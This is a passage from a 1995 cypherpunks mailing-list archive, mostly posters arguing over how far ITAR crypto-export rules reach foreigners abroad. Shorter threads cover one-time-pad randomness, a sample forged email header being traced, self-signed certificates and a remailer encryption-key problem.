personal impact are enforceable in court, such as tax treaties.

In the case of a treaty saying "you aren't breaking a third country's
laws if you transmit something that wouldn't be legal to say in that
country over its telecom lines", its a personal rather than a national
impact and it could be enforced in a U.S. court.

> >> Perry's somewhat offensive language is not a substitute for an argument.
> 
> >Thank you for the ad hominem.
> 
> Perry used the phrase "lobotomized mongoloid judge" I think that this
> type of language is offensive and unnecessary.

To whom was I being offensive, Mr. Hallam, given that I was refering
to a theoretical non-extant personage? Or are you a charter member of
"lobotomized mongoloids for equal justice" or some such.

> Ad hominem is a perfectly valid form of argument where one is considering
> the reputation of the person making the statement.

Yes, but my reputation is irrelevant to whether or not you can be
prosecuted as a foreigner for the act of handing another foreigner
cryptographic software outside the U.S.

Perry





From pkoning at chipcom.com  Tue Nov  7 09:32:15 1995
From: pkoning at chipcom.com (Paul Koning 1695)
Date: Wed, 8 Nov 1995 01:32:15 +0800
Subject: using pgp to make an otp
Message-ID: <309FBAB3@mailer2>



Will it ever sink in that NO algorithm produces a "random" bitstring, and
therefore NO algorithm can be the driver of a one time pad?

The output of an algorithm is (at best) PSEUDOrandom.  While a stream
cypher constructed that way may be strong, it is NOT a one time pad and
does NOT share with one time pad the unique property of being absolutely
unbreakable from first principles.  (It may very well have the property that
it is too hard to break in practice -- if so it makes a useful cryptosystem.
But to call such a thing "OTP" indicates a fundamental misunderstanding.)

See the sci.crypt FAQ for more details.

     paul

 ----------
From: owner-cypherpunks
To: Adam Shostack
Cc: Alan.Pugh; cypherpunks
Subject: Re: using pgp to make an otp
Date: Monday, November 06, 1995 11:31PM

>       PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

 -derek





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Tue Nov  7 09:32:58 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 8 Nov 1995 01:32:58 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>
Message-ID: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Michael Froomkin writes:

: I am delighted to discover that there is a person in this world who reads 
: the ITAR more broadly than I do.  I can see how the ITAR could be read to 
: reach a Frenchman who sends crypto via email to a German that happens, 
: through no fault of his own, to be routed via New York; we might have to 
: talk about whether the scienter requirment would mean that M. Frenchman 
: knew or should have known about the routing.  [NB "could be read" does 
: not equal "should be read".]
: 
: Not even I, however, would imagine that any court anywhere, could read 
: the ITAR or the legislation authorizing it (which is more to the point) 
: as reaching two foreigners talking abroad, neither of whom is a US person.

I quite agree that no one can read the Arms Control Export Act as
authorizing the definition of export in the ITAR that requires, among
other things, that a foreign person get a license that the ACEA says
that he can't get, before discloing cryptographic software to another
foreign person ``in the United States or abroad''.

The ITAR violates not only the first amendment to the United States
Constitution, it also violates the separation of powers doctrine.  But
it still says what it says.  (And that is why it is unconstitutional.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From froomkin at law.miami.edu  Tue Nov  7 09:40:48 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 01:40:48 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>


On Tue, 7 Nov 1995, Peter D. Junger wrote:

> I quite agree that no one can read the Arms Control Export Act as 
>authorizing the definition of export in the ITAR that requires, among 
>other things, that a foreign person get a license that the ACEA says 
>that he can't get, before discloing cryptographic software to another 
>foreign person ``in the United States or abroad''. 
> 
> The ITAR violates not only the first amendment to the United States 
> Constitution, it also violates the separation of powers doctrine.  But 
> it still says what it says.  (And that is why it is unconstitutional.) >

[Note that this small disagreement between PDJ and me should not obscure 
our larger areas of agreement...]

To reiterate my point in legalese:  any court construing the ACEA would
inevitably read the prohibition on "exporting" to a foreign person as not
applying where the nation lacks jurisdiction.  This is not even a case of
applying a construction to save the constitutionality of the statute
(since it could well take a narrower construction to do that).  It's just
common sense, which courts actually resort to on occasion. 

In short, in this particular case the ACEA, and by extention the ITAR,
doesn't "say what it says"  it "says what it must mean".  This is an
important way in which legal parsing differs from compiling... 

,,,,,

I'd be interested in hearing more about why you say the ITAR violates
separation of powers: because it gives the executive branch too much power
to define the elements of a criminal offense? 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From tien at well.com  Tue Nov  7 09:45:26 1995
From: tien at well.com (Lee Tien)
Date: Wed, 8 Nov 1995 01:45:26 +0800
Subject: forging headers (with more header information)
Message-ID: <199511071708.JAA25692@well.com>



My apologies.  I followed Tim's advice and turned on verbose headers, and
this is what I got.

Lee


Return-Path: freeh at fbi.gov
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
(8.6.12/8.6.12) with SMTP id NAA20123 for <tien at well.sf.ca.us>; Tue, 24 Oct
1995 13:06:23 -0700
From: freeh at fbi.gov
Message-Id: <199510242006.NAA20123 at well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400
Apparently-To: tien at well.sf.ca.us
X-UIDL: 814570964.056

> How difficult is it to forge headers?  How difficult is it to trace a
> message to the actual sender if the header is forged?

Not very difficult at all (to forge, that is).  This is a quick and dirty
example that should be somewhat traceable.  If you want pointers on how to
trace it, post the whole thing, including headers, to cypherpunks.

Louis






From gnu at toad.com  Wed Nov  8 01:54:48 1995
From: gnu at toad.com (John Gilmore)
Date: Wed, 8 Nov 95 01:54:48 PST
Subject: Call For Papers - Conference on Redistributable Software
Message-ID: <9511080954.AA13883@toad.com>


[I'm hoping that we can get some papers on freely redistributable
*crypto* and *security* software -- like PGP or PEM or SSL_eay or
Kerberos or brute-force tools or SATAN or Java tools or whatever!  I'm
on the program committee and am trying to make the conference as broad
as possible, not just focusing on "traditional" free software.  Help!
--gnu]

		CALL FOR PAPERS

	First Conference on Freely Redistributable Software

	Sponsored by the Free Software Foundation

		2-5 February 1996
		Cambridge, MA

Over the past 15 years, free and low-cost software has become ubiquitous.  
This conference will bring together implementors of several different types 
of freely redistributable software and publishers of such software (on 
various media).

There will be tutorials and refereed papers, as well as keynotes by
        Linus Torvalds and Richard Stallman

The Conference will be held at the Cambridge Center Marriott, 
2-5 February 1996.  

Papers are invited on any aspect of GNU, Linux, NetBSD, 386BSD, FreeBSD, 
expect, PERL, tcl/tk, and other tools for which the code is accessible 
and redistributable.

Extended abstracts are due on or before Thursday, 30 November 1995. 

Authors will be notified no later than 8 December.
Full papers will be due Thursday, 4 January 1996.

Program committee:
        Peter H. Salus, chair
        Robert J. Chassell
        Chris Demetriou
        John Gilmore
        Marshall Kirk McKusick
        Rich Morin
        Eric S. Raymond 
        Vernor Vinge

Abstracts of 350-750 words (in troff, PostScript, or straight ASCII, 
only) should be sent to
        conf96 at gnu.ai.mit.edu
-- 
-----------------------------------------------------------
Peter H. Salus  #3303  4 Longfellow Place  Boston, MA 02114
	+1 617 723 3092
-----------------------------------------------------------






From cjs at netcom.com  Tue Nov  7 10:04:48 1995
From: cjs at netcom.com (cjs)
Date: Wed, 8 Nov 1995 02:04:48 +0800
Subject: Sign my own certificates?
Message-ID: <199511071736.JAA29605@netcom20.netcom.com>


Oh jesus, I need to get myself a certificate for the netscape servers
at work.

All I need are three forms of identification, two written letters, an
authorized signature, $300, mailed and faxed, along with an e-mail
or two.

I think this is an amazing pain in the ass. Any way I could sign a
certificate by myself for myself and have it work with the netscape
products? 

Just curious,
Christopher






From perry at piermont.com  Tue Nov  7 10:17:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 02:17:32 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511071753.MAA00375@jekyll.piermont.com>



"Peter D. Junger" writes:
> : Where the hell did you get that idea? [that the ITAR applies to
> : foreigners abroad].
> 
> >From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
> 
>  . . . .
> 
>  (4) Disclosing (including oral or visual disclosure) or transfering
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

That can't possibly be considered under U.S. law to apply to
foreigners talking to foreigners abroad, and if you are really a
lawyer you should know that the mere fact that the law doesn't mention
its jurisdiction doesn't make it unlimited. The statutes of New York
State say that I can be prosecuted for running a red light. No where
at all do they say that the red light must be in New York State, but I
suspect that it would be completely impossible for the NY State
attorney general to get any court, in New York State or elsewhere, to
hear a case that I violated New York law by running a light in
Turkmenistan.

> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

Do you actually call yourself a lawyer?

You appear to be ignorant of the most basic facts of our legal system
-- knowledge that I, as a complete layman, am completely comfortable
with. I wouldn't pretend to be able to practice law, but even I can
smell utterly insane readings of the regulations.

Perry





From perry at piermont.com  Tue Nov  7 10:32:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 02:32:33 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511071803.NAA00410@jekyll.piermont.com>



"William Allen Simpson" writes:
> As most of us agree that 56-bits is not enough (DES), the 512-bit prime
> seems a waste of time and a tempting target.  I'd like to drop it, but
> Phil is inclined to keep it with a disclaimer.

I agree with your approach, Bill -- it seems worth dropping. Something
this dangerous isn't worth leaving around for people to accidently
use.

Perry





From dsmith at cdale1.midwest.net  Tue Nov  7 10:46:32 1995
From: dsmith at cdale1.midwest.net (David E. Smith)
Date: Wed, 8 Nov 1995 02:46:32 +0800
Subject: forging headers (with more header information)
Message-ID: <43796.dsmith@[204.248.40.2]>


On Tue, 7 Nov 1995 09:08:39 -0800, Lee Tien wrote:
>Return-Path: freeh at fbi.gov
>Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
>(8.6.12/8.6.12) with SMTP id NAA20123 for <tien at well.sf.ca.us>; Tue, 24 Oct
>1995 13:06:23 -0700
>From: freeh at fbi.gov
>Message-Id: <199510242006.NAA20123 at well.com>
>Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
>        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien at well.sf.ca.us
>X-UIDL: 814570964.056

Without having any access to anything but the headers, it looks like
you are an employee for SGI and sent the message from there.

Look at the last Received: header.  It went from sgi.com to mit.edu to
well.com and then to you.

Dave
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/





From perry at piermont.com  Tue Nov  7 12:05:36 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 04:05:36 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511071907.VAA01462@grumble.grondar.za>
Message-ID: <199511071918.OAA05283@jekyll.piermont.com>



Mark Murray writes:
> Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> non-US or otherwise can buy crypto books - you just can't get the code
> on floppy. Bruce Schneier went through this procedure when he CJ'ed
> "Applied Cryptography".

To my knowledge, Bruce Schneier never CJ'ed "Applied
Cryptography". Phil Karn did that.

Perry





From froomkin at law.miami.edu  Tue Nov  7 12:24:27 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 04:24:27 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>


[much trimmed in various places]

On Tue, 7 Nov 1995, Peter D. Junger wrote:

> Michael Froomkin writes:
> : To reiterate my point in legalese:  any court construing the ACEA would
> : inevitably read the prohibition on "exporting" to a foreign person as not
> : applying where the nation lacks jurisdiction.  This is not even a case of
> : applying a construction to save the constitutionality of the statute
> : (since it could well take a narrower construction to do that).  It's just
> : common sense, which courts actually resort to on occasion. 
> I would admit that a court might do this in an effort to hold the
> statute constitutional, but a court might also hold the regulations
> unconstitutional because they are overbroad.  Remember, the first

Technically, this is holding the regulations ultra vires, not 
unconsitutional; the difference matters.

> amendment is the one area where one has standing to raise facial
> constitutonal claims even though one's own constitutional rights are
> not infringed.  Consider the case where a foreigner in the United
> States discloses to another foreigner, and is then prosecuted.
> Couldn't he raise the point in his defense?
>
Note the change in fact pattern: now both foreigners are IN the US where 
indeed they are subject to US law.  My bet: the court has no trouble 
applying the ITAR to these facts and convicting.  I agree this is a 
little silly; but not silly enough to stop it.  [The government will 
argue, and win, as follows: suppose there is no law against murder in 
either of the nations they come from.  Does that mean they can kill each 
other here?]
 
> (But of course the ITAR as applied to cryptographic software--and that
> is all that I am talking about--are so unconstitutional in so many
> different ways that nothing is going to turn on that one issue.)

This issue is now in front of two district judges.

> But the real problem--to the extent that there is a real problem--is a
> more practical one.  What happens when some foreign person who has set
> up a large on-line archive of cryptographic software, in part just to
> twit the Americans, tries to immigrate to the United States?  If he is
> excluded because he violated the export control laws, is he even going
> to get a court hearing?  And if by some miracle he does get a court

Won't need it.  He has committed no offense.  If his petition is turned 
down, he has a right of action.

> hearing, isn't the government going to (i) argue that he was
> conspiring with some Americans--which would make him indistinguishable

Without evidence, they will lose.  Even with evidence, not obvious he has 
done anything wrong.

> from Noriega--and (ii) argue that he has to be covered, because one cannot
> distinguish his case from that of a foreign person who disclosed
> cryptographic software within the United States to another foreign
> person.  (Remember, the regulation says ``within the United States or
> abroad''?)

They lose.  You distinguish it easily ("Now where exactly was the 
defendant at the time, Mr. US Atty?  Germany?  Case dismissed.")

> : I'd be interested in hearing more about why you say the ITAR violates
> : separation of powers: because it gives the executive branch too much power
> : to define the elements of a criminal offense? 
> 
> 
> Not that.  My point most simply is that the AECA does not say what the
> ITAR says, and that that is why the language of the ITAR violates the
> doctrine of separation of powers.  Your argument--as I understand

Ah. Terminological confusion.  That's not a constitutional violation.  
It's an agency misconstruing a statute, renderinig the regulations invalid.
See the Administrative Procedures Act....

> it--is that the courts will not construe the ACEA as authorizing the
> weird and unconstitutional definitions in the ITAR.  My point is that 
> the ACEA doesn't authorize the ITAR and that therefore the ITAR is
> unenforceable on separation of powers grounds.
> 
> I wrote an article about this twenty-five years ago arguing that the
> Pentagon Papers case can best be explained as a separation of powers
> case.  In the opinions in that case, Near v. Minnesotta was the most
> cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
> second.  My conclusion was that when a court is confronted with a hard
> constitutional issue, the better part of valor is to decide the case on
> separation of powers grounds, if possible.  In Pentagon Papers there was

It's too far off topic to pursue any further, but I must take exception 
to the suggestion that we are well served by separation of powers 
intruding into other legal domains.  Bowsher tells us that causation 
principles go out the window in SOP cases.  That alone makes it radioactive.

> no congressional authority for the injunction sought; in the case of the
> ITAR there is no congressional authority for the definition of export as
> it applies to software (as opposed to hardware).


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From mark at grondar.za  Tue Nov  7 12:37:15 1995
From: mark at grondar.za (Mark Murray)
Date: Wed, 8 Nov 1995 04:37:15 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071907.VAA01462@grumble.grondar.za>


> 
> "Peter D. Junger" writes:
> > : Where the hell did you get that idea? [that the ITAR applies to
> > : foreigners abroad].
> > 
> > >From Section 120.17 of the ITAR which provides:
> > 
> >  _Export_ means:
> > 
> >  . . . .
> > 
> >  (4) Disclosing (including oral or visual disclosure) or transfering
> >  technical data to a foreign person, whether in the United States or
> >  abroad . . . .

Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
non-US or otherwise can buy crypto books - you just can't get the code
on floppy. Bruce Schneier went through this procedure when he CJ'ed
"Applied Cryptography".

\begin{lighter_note}
The illegal bit about (for instance) the munitions T-shirt is that it
has a bar code. _This_ makes it illegal for export, because not only is
it machine washable, it is machine readable.
\end{lighter_note}

Academic exchange of mathematical knowledge has never been under scrutiny.

"Technical data" will have to be interpreted to mean somethiing different,
like details of the inner workings of militart encryption equipment and the
like.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key





From cardtris at umich.edu  Tue Nov  7 12:40:34 1995
From: cardtris at umich.edu (Jennifer Mansfield-Jones)
Date: Wed, 8 Nov 1995 04:40:34 +0800
Subject: encrypt-key remailers
Message-ID: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>


-----BEGIN PGP SIGNED MESSAGE-----

Hello, all -- 

I've a semi-clueless question for the gurus here.  I'm trying to
use the Encrypt-Key option on some of the mixmaster (type I)
cypherpunks remailers, and running into trouble.

Please pardon the level of gory detail here; I'm at a loss to
see what I'm missing, so I present a verbatim record of what I
have tried so far.  Consider the sample remailing directions
below.  The remailer-help documents include very similar
examples.  The single-space indenting is only to indicate where
files are included, and avoid complaints from pgp-aware mail
handlers.

 ::
 Encrypt-Key: apasswd
 Request-Remailing-To: cardtris at umich.edu
 Subject: reply-block-test

 **



The above gets encrypted with flame's public key, yielding a
normal little PGP message.

The block gets 

 ::
 Encrypted: PGP

Prepended onto it, and the result looks like:

 ::
 Encrypted: PGP
 
 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwDQyA95PVgp+UBA/4/Vm0EMi2BYBCioaLe35qx1rOxQVGEYoulmwjdDtFsXTup
 L08nyycNVIdxIAW5O+0T4kVuV3/ycAd84SmxDAls9n5Ebc6vP+gwE+dWCaY1TNok
 1Ju08hheCJ2nC0piiN/eT0eR646fMvKGI1CiitBKXPSSkPT6alYlQvLPxd+uV6YA
 AACBvZthKwNEb5DQg/5otGH3njgrJISEyvgEKDZaMFuOUPzxk4IZ4NXm0v2cgHVz
 yxMelKz4WHnOylmZ3WWTFmngukIdasIiFf5avRZ/A4Ff1FRXf7SpxvTfGpA4pYPE
 yjmFhsw/NCnRVqBAH65MiU0USQhPZkZDwLe6spBaJpxENq5C
 =/tbc
 -----END PGP MESSAGE-----
 
 
Trying the above, I find that it does *sort of* work as a reply
block.  If I append sample text and send everything to
remailer at flame.alias.net, I get a reply back that looks like, for
instance: 

Date: Mon, 6 Nov 1995 19:22:13 +0100
From: Anonymous <nobody at flame.alias.net>
To: cardtris at umich.edu
Subject: reply-block-test

**


The appended text, which I expected to come back conventionally
encrypted with 'apasswd', has just vanished into the void.  
Obviously I'm missing something... probably something that seemed 
painfully obvious to the writer of the remailer help file.  If I 
omit the encryption key and '**', I can get reply blocks to work fine,
even chained through multiple remailers.  Suggestions?

   many thanks,

                                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Dept. of Biology                         Jennifer Mansfield-Jones
 University of Michigan                           cardtris at umich.edu
http://www-personal.umich.edu/~cardtris/cardtris.htm
                                             ^---- PGP key available

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ5ueHTZ8yRAewEFAQEewgP/U3OhcBaKSjd1Jpg51UX7NMD3SfrF56WI
fQExYw1lG70GqfEko9T1ft89mDJlj1IvjToR6TJPws8P919Y2qikw333wCt6A9eR
pTMf2Jy1OjKwXRIqlFtrIMky+X2jUYDSMk3H+U1IwT7jjJUfVtzPuSEia0ZzFGmi
U5BLQvrLamQ=
=z1yS
-----END PGP SIGNATURE-----





From mark at grondar.za  Tue Nov  7 12:49:03 1995
From: mark at grondar.za (Mark Murray)
Date: Wed, 8 Nov 1995 04:49:03 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071925.VAA01520@grumble.grondar.za>


> 
> Mark Murray writes:
> > Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> > non-US or otherwise can buy crypto books - you just can't get the code
> > on floppy. Bruce Schneier went through this procedure when he CJ'ed
> > "Applied Cryptography".
> 
> To my knowledge, Bruce Schneier never CJ'ed "Applied
> Cryptography". Phil Karn did that.

Point is, it got CJ'ed, and easily too. In fact I understand that the
process was 'trivial'. Just the software on floppy was a problem.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key





From hfarkas at carfax.ims.advantis.com  Tue Nov  7 12:52:57 1995
From: hfarkas at carfax.ims.advantis.com (Henry W. Farkas)
Date: Wed, 8 Nov 1995 04:52:57 +0800
Subject: Video as a source of randomness
In-Reply-To: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
Message-ID: <Pine.A32.3.91.951107144655.17867B-100000@gandalf.ims.advantis.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 5 Nov 1995, SINCLAIR DOUGLAS N wrote:

> The cheapest strong source of video noise that I can think of would be
> a small fan with a ribbon tied to the grille.  As long as it's in a
> turbulent flow regime, you'll get very random numbers at a fast rate.

Oh, I don't know about cheapest.  Electricity costs money.  How does $.32 
per day sound to you?  I've come up with a successful algorithm that 
works like this: I generate a number based upon a random seed.  To get 
the seed, I mail a letter in exactly the same bin at exactly noon 
Monday - Saturday at the US Post Office on Orange Street in New Haven, 
CT.  The letter is always addressed to the exact same recipient.  I simply 
record the number of days it takes for the letter to arrive.  Guaranteed 
random.

===========================================================================
     Henry W. Farkas      |     Me?     Speak for IBM?     Fat chance.
 hfarkas at ims.advantis.com |------------------------------------------------  
   hfarkas at vnet.ibm.com   |     http://www.ims.advantis.com/~hfarkas
      henry at nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
We'll just outlaw unlicensed cryptography.  After all, it works in France.
You don't see weekly terrorist attacks there any more do you?  - futplex -
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMJ+5WqDthkLkvrK9AQFsgwP/UFHv+skRuUb/2V3QgUHmXcDe/dZfBZaZ
d4A78fuixruhtpCU6dJKcfpUzyWz8Y+iYGll+bFiotJuX2xrSnYji2TbesWsp0AL
XjczoLdG/V2RRQrx57R8Zdq33W6QFb/7j16NdXghLizvxUi5LVk6zRAakMhwa2FM
3+ywY6mgM2I=
=dBcX
-----END PGP SIGNATURE-----





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Tue Nov  7 12:56:20 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 8 Nov 1995 04:56:20 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>
Message-ID: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Michael Froomkin writes:

: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > I quite agree that no one can read the Arms Control Export Act as 
: >authorizing the definition of export in the ITAR that requires, among 
: >other things, that a foreign person get a license that the ACEA says 
: >that he can't get, before discloing cryptographic software to another 
: >foreign person ``in the United States or abroad''. 
: > 
: > The ITAR violates not only the first amendment to the United States 
: > Constitution, it also violates the separation of powers doctrine.  But 
: > it still says what it says.  (And that is why it is unconstitutional.) >
: 
: [Note that this small disagreement between PDJ and me should not obscure 
: our larger areas of agreement...]
: 
: To reiterate my point in legalese:  any court construing the ACEA would
: inevitably read the prohibition on "exporting" to a foreign person as not
: applying where the nation lacks jurisdiction.  This is not even a case of
: applying a construction to save the constitutionality of the statute
: (since it could well take a narrower construction to do that).  It's just
: common sense, which courts actually resort to on occasion. 

I would admit that a court might do this in an effort to hold the
statute constitutional, but a court might also hold the regulations
unconstitutional because they are overbroad.  Remember, the first
amendment is the one area where one has standing to raise facial
constitutonal claims even though one's own constitutional rights are
not infringed.  Consider the case where a foreigner in the United
States discloses to another foreigner, and is then prosecuted.
Couldn't he raise the point in his defense?

(But of course the ITAR as applied to cryptographic software--and that
is all that I am talking about--are so unconstitutional in so many
different ways that nothing is going to turn on that one issue.)

But the real problem--to the extent that there is a real problem--is a
more practical one.  What happens when some foreign person who has set
up a large on-line archive of cryptographic software, in part just to
twit the Americans, tries to immigrate to the United States?  If he is
excluded because he violated the export control laws, is he even going
to get a court hearing?  And if by some miracle he does get a court
hearing, isn't the government going to (i) argue that he was
conspiring with some Americans--which would make him indistinguishable
from Noriega--and (ii) argue that he has to be covered, because one cannot
distinguish his case from that of a foreign person who disclosed
cryptographic software within the United States to another foreign
person.  (Remember, the regulation says ``within the United States or
abroad''?)
 
: In short, in this particular case the ACEA, and by extention the ITAR,
: doesn't "say what it says"  it "says what it must mean".  This is an
: important way in which legal parsing differs from compiling... 
 
: ,,,,,
: 
: I'd be interested in hearing more about why you say the ITAR violates
: separation of powers: because it gives the executive branch too much power
: to define the elements of a criminal offense? 


Not that.  My point most simply is that the AECA does not say what the
ITAR says, and that that is why the language of the ITAR violates the
doctrine of separation of powers.  Your argument--as I understand
it--is that the courts will not construe the ACEA as authorizing the
weird and unconstitutional definitions in the ITAR.  My point is that 
the ACEA doesn't authorize the ITAR and that therefore the ITAR is
unenforceable on separation of powers grounds.

I wrote an article about this twenty-five years ago arguing that the
Pentagon Papers case can best be explained as a separation of powers
case.  In the opinions in that case, Near v. Minnesotta was the most
cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
second.  My conclusion was that when a court is confronted with a hard
constitutional issue, the better part of valor is to decide the case on
separation of powers grounds, if possible.  In Pentagon Papers there was
no congressional authority for the injunction sought; in the case of the
ITAR there is no congressional authority for the definition of export as
it applies to software (as opposed to hardware).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From jya at pipeline.com  Tue Nov  7 13:28:16 1995
From: jya at pipeline.com (John Young)
Date: Wed, 8 Nov 1995 05:28:16 +0800
Subject: CYB_lip
Message-ID: <199511071543.KAA24880@pipe2.nyc.pipeline.com>


   11-7-95. Washrag:

   "Cyber Liberation."

      The future of American politics is being decided in
      semiconductor plants in Santa Clara, in the cluttered
      offices of all-night software designers in Redmond, and,
      of course, all over the Internet. "At some point in the
      not-very-distant future," says Newt Gingrich, "somebody
      is going to have encryption you can't break....
      Governments are not going to be able to stop it."

      This brave new world is closer than you think. It will
      drastically change the focus of politics because control
      will be extremely difficult, if not impossible. We're on
      the brink of a revolution that will make what the
      Republicans are doing this year look trivial beyond
      belief.

      The Internet has the potential to set us free -- to
      learn anything and do anything, whenever we want. No
      wonder politicians want to regulate it to death.

   CYB_lip  (7 kb)














From sjb at universe.digex.net  Tue Nov  7 13:35:20 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 8 Nov 1995 05:35:20 +0800
Subject: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511072043.PAA12012@universe.digex.net>


"Peter D. Junger" writes:
>"Perry E. Metzger" writes:
>
>: 
>: Thaddeus J. Beier writes:
>: > So, if this person was sending cryptographics codes from Switzerland
>: > to Israel, the code would have been imported to the US, then exported
>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>: > but it might be something to threaten UUNET with if one of their Northern
>: > Virginia neighbors ever wanted something the couldn't get otherwise.
>: 
>: It isn't clear that telecoms treaties don't implicitly make this legal
>: in spite of the export regulations.
>
>Once again, what the ITAR forbid is the disclosure of cryptographic
>software to a foreign person within or without the United States, so
>it does not make any difference whether the message containing the
>code passes through the United States or not.

OTOH, the ITAR explicitly permits "temporarily imported" munitions to
be re-exported.  Those clauses should entirely eliminate the issue of
whether UUNET could be held liable under ITAR.  ITAR says otherwise --
see section 120.18.





From hallam at w3.org  Tue Nov  7 13:37:44 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 8 Nov 1995 05:37:44 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>
Message-ID: <9511072043.AA12971@zorch.w3.org>



>> I would admit that a court might do this in an effort to hold the
>> statute constitutional, but a court might also hold the regulations
>> unconstitutional because they are overbroad.  Remember, the first

>Technically, this is holding the regulations ultra vires, not 
>unconsitutional; the difference matters.

I thought Peter was arguing that the separation of powers would be
affected? Surely this would be a constitutional question?

On the strict ultra-vires question and enforcement on non US citizens
may I sugest two hypotheticals?

Hyptotheical A:

I develop a crypoto system in Geneva and pass the source code to my
co-worker. Neither of us have export certificates.

Hypothetical B:

